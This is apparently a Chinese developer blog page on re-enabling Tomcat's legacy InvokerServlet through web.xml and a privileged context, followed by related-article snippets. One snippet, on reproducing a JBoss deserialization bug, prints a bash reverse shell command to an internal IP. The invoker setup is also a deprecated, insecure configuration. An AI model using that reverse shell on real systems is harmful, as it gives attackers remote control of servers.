tomcat InvokerServlet 使用

最新推荐文章于 2024-08-29 21:45:24 发布
最新推荐文章于 2024-08-29 21:45:24 发布 · 283 阅读 · 0
文章标签:

#Tomcat #Servlet #Web #Apache #XML

本文介绍了解决Java.lang.SecurityException错误的方法,该错误发生在使用Tomcat的InvokerServlet时。通过修改web.xml和context.xml文件,可以确保应用正确加载并避免安全异常。

java.lang.SecurityException: Servlet of class org.apache.catalina.servlets.InvokerServlet is privileged and cannot be loaded by this web application
 解决之道:

 

tomcat  conf/web.xml中

<!-- InvokerServlet
       处理一个WEB APP中的匿名servlet
       当一个servlet被编写并编译放入/WEB-INF/classes/中,却没有在/WEB-INF/web.xml中定义的时候
       该servlet被调用,把匿名servlet映射成/servlet/ClassName的形式
       URL PATTERN MAPPING : /servlet/*
       -->

    <servlet>
        <servlet-name>invoker</servlet-name>
        <servlet-class>
          org.apache.catalina.servlets.InvokerServlet
        </servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <load-on-startup>2</load-on-startup>
    </servlet>


<servlet-mapping>
        <servlet-name>invoker</servlet-name>
        <url-pattern>/servlet/*</url-pattern>
</servlet-mapping>

 

conf\context.xml
中<Context>节点修改为 <Context privileged="true">

如何使用tomcat--学习笔记
08-16
【如何使用Tomcat——学习笔记】 Tomcat是一款广泛使用的开源Java Servlet容器,它实现了Java EE的Web部分,包括Servlet和JSP规范。本教程将详细解释如何配置和使用Tomcat,以便于开发和测试Servlet应用。 1. **...
tomcat php 简单配置
03-18
通常,PHP和Apache或Nginx等Web服务器一起使用,但有时我们可能需要在Tomcat环境下运行PHP应用,这需要一些特殊的配置。本文将详细讲解如何在Tomcat中进行PHP的简单配置。 首先,我们需要理解Tomcat和PHP的基本工作...
Web Application的invoker servlet
chh_jiang的专栏
02-04 283
Web Application Server提供了一种默认的访问servlet的方式,即通过http://myWebApp/mypackage.MyServlet的方式直接访问,而不需要定义&lt;servlet/&gt;和&lt;servlet-mapping/&gt;,这个功能称为invoker servlet,但是现在的App Server一般都默认禁用了这个功能,比如Tomcat在conf...
tomcat6.X 使用Invoker Servlet
明月当空
03-14 803
tomcat 6.X以后貌似不再支持自动支持InvokerServlet了。下面手动开启:1.先启动Servlet激活配置器服务     即在%CATALINA_HOME%/conf/web.xml里,去掉              invoker                  org.apache.catalina.servlets.InvokerServlet           
Java的InvokerServlet
lvzhuyiyi4的专栏
11-07 342
今天看 《servlet与jsp核心编程》,很老的书了,但却是servlet最经典的书籍,里面介绍了一种InvokerServlet的技术,想在tomcat 7中应用,一直没发现为什么,直到在stackOverflow上找到答案: You're probably confusing with the legacy Tomcat-builtin InvokerServlet which wa...
Tomcat 7/8 不支持 Invoker Servlet 的解决方法
weixin_33858336的博客
09-07 454
为什么80%的码农都做不了架构师?>>> ...
Tomcat中的invoker
山顶冻人的专栏
10-25 1734
FROM:http://www.darkmi.com/blog/archives/878 invoker为方便servlet的开发与调试开启了一道大门,免去了开发一个servlet就要在web.xml文件中添加相应配置信息的麻烦。以下是位于$TOMCAT_HOME/conf/web.xml文件中对于invoker的说明:
Linux环境下详细安装Tomcat指南
- 启用InvokerServlet:同样在`$TOMCAT_HOME/conf/web.xml`中,取消对`servlet-mapping`部分的注释,以便能够通过/servlet/*访问服务。 5. 修改端口号: - 默认情况下,Tomcat监听8080端口。若想将其设置为HTTP...
IIS与Tomcat整合
02-08
- 使用`E:\apache-tomcat-5.5.23\bin`目录下的`startup.bat`脚本启动Tomcat服务。 4. **验证Tomcat安装:** - 通过浏览器访问`http://localhost:8080`,若能看到Tomcat的欢迎页面,则表示安装成功。 #### 四、...
Linux下安装Tomcat
09-24
### Linux下安装与配置Tomcat知识点详解 #### 一、下载Tomcat 1. **下载地址**: ...值得注意的是,随着技术的发展,当前推荐使用更高版本的Tomcat,同时建议关注安全性和性能优化等方面的配置。
Tomcatinvoker使用总结
e度空间
02-28 312
Tomcatinvoker使用总结 invoker为方便servlet的开发与调试开启了一道大门,免去了开发一个servlet就要在web.xml文件中添加相应配置信息的麻烦。以下是位于$TOMCAT_HOME/conf/web.xml文件中对于invoker的说明: &lt;!-- The "invoker" servlet, which execut...
InvokerServlet 激活器
weixin_34270606的博客
05-23 187
2019独角兽企业重金招聘Python工程师标准>>> ...
Tomcat中的org.apache.catalina.servlets.InvokerServlet
ruiwang6666的博客
03-22 2230
本文属于学习记录,原:http://blog.youkuaiyun.com/u014805086/article/details/52179605 Tomcat6有一个类org.apache.catalina.servlets.InvokerServlet,它负责处理没有做ServletMapping的那些Servlet.但是,在tomcat安装目录的conf/web.xml中,系统默认情况下把org.
Tomcat 9 org.apache.catalina.servlets.InvokerServlet not found Servelt调用器
weixin_30299709的博客
05-22 237
结论:   InvokerServlettomcat 7 + 已经彻底移除,不安全,使用标准的方式、@WebServlet("/path")等代替 url 访问方式:   http://host/servlet/packageName.servletName,不推荐使用 web.xml 可能见到下面的配置   该配置不推荐使用。 <servlet> &...
Tomcat 7用注解方式实现invoker
jiangjian0926的专栏
05-12 766
Tomcat 7以前的版本支持Servlet激活器,但Tomcat7却不再支持。 Servlet激活器有以下缺点: 1、应用的类名直接暴露在路径中,这是显而易见的安全问题。 2、缺乏配置信息造成类调用的混乱。在有同名类的时候,服务器无法确定调用这个类还是那个类。而在web.xml中每个应用都有明确的描述和路径映射,对应用的运行有明确的线路,且更有利于应用的维护。 3、存
How Tomcat Works之第十二章之invoke方法
luccs624061082的专栏
06-27 719
Tomcat 4中,StandardContext的invoke方法由相关联的连接器调用或者如果StandardContext是一个主机的子容器,由host的invoke方法调用。StandardContext的invoke方法先检查应用的重载是否发生。如果是的,就等到应用的重新载入完成为止。之后调用它父类invoke方法,Containerbase。下面显示了StandardContext类的
TongWeb支持InvokerServlet
web的博客
11-10 487
InvokerServlet功能早在tomcat7之后已经废除,但由于很多老应用依旧采用而且不想改造,所以TongWeb也增加了该功能。 TongWeb6、TongWeb7 默认不开启InvokerServlet,需在conf/default-web.xml中增加如下servlet打开InvokerServlet功能。 <servlet> <servlet-name>invoker</servlet-name> <!-- TongWe......
神文 | tomcatservlet
最新发布
sunheng9526的博客
08-29 303
转载于:https://zhuanlan.zhihu.com/p/465936851首先说明,Servlet什么都不是,他只是一个规范,是Java的一个接口。所以Servlet做的事情就是接口做的事情,Java的接口的作用就是规范。servlet接口定义的是一套处理网络请求的规范,所有实现servlet的类,都需要实现它那五个方法,其中最主要的是两个生命周期方法 init()和destroy(),还有一个处理请求的service(),也就是说,所有实现servlet接口的类,或者说,所有想要处理网络请求的类
JBoss JMXInvokerServlet 反序列化漏洞
weixin_42687904的博客
08-21 607
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2017-12149) 记一次JBoss反序列化漏洞复现过程 如图,搭建一个JBoss环境 (备注:CVE-2017-12149适用JBoss版本:5.x / 6.x) 漏洞原理: 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化 编写反弹shell命令: bash -i >& /dev/tcp/192.168.10.100/21 0>&1 由于Run
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值